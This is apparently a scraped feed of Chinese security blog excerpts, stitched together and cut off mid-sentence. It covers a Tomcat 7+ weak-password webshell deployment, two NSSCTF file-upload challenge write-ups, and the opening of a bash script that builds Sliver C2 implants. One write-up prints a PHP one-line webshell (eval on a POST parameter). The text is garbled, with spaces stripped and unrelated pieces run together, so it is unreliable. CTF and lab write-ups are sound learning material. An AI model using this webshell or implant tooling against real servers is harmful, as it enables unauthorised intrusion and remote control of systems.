Tomcat7+弱口令&&后台getshell漏洞环境说明Tomcat支持后台部署war文件，可以直接将webshell部署到web目录下。其中，欲访问后台，需要对应用户有相应权限。Tomcat7+权限分为：manger（后台管理）manger-gui拥有html页面权限manger-status拥有查看status的权限mager-jmx拥有jmx权限

[UUCTF2022新生赛]ez_upload题目来源：nssctf题目类型：web涉及考点：文件上传1.题目给了一个上传入口，直接传muma.php试试一句话木马为<scriptlanguage="php">eval($_POST['r00ts']);</script>回显如下：换成muma.jpg试试：上传成功，再上传.htaccess文件进行解析，但是上传失

[NISACTF2022]bingdundun~题目来源：nssctf题目类型：web涉及考点：文件上传1.题目给了一个点击按钮，进去之后是上传入口还是选择之前的muma.jpg上传：上传成功，我们再利用bp抓包修改成muma.php试试上传失败了，我们回去看看有没有啥提示，在源代码中发现：额，好像没什么用

生成sliver木马多个步骤合成一个sh#!/bin/bash#date:20230222host_ip=$1WORK_DIR=/opt/workrm-rf/root/.sliver-client/cd${WORK_DIR}/sliverrm-rfadjectives.txtbas_192.0.2.1.cfgmuma_x*nouns.txtsliver.dbversionconfigs/database.jsonconfigs/htt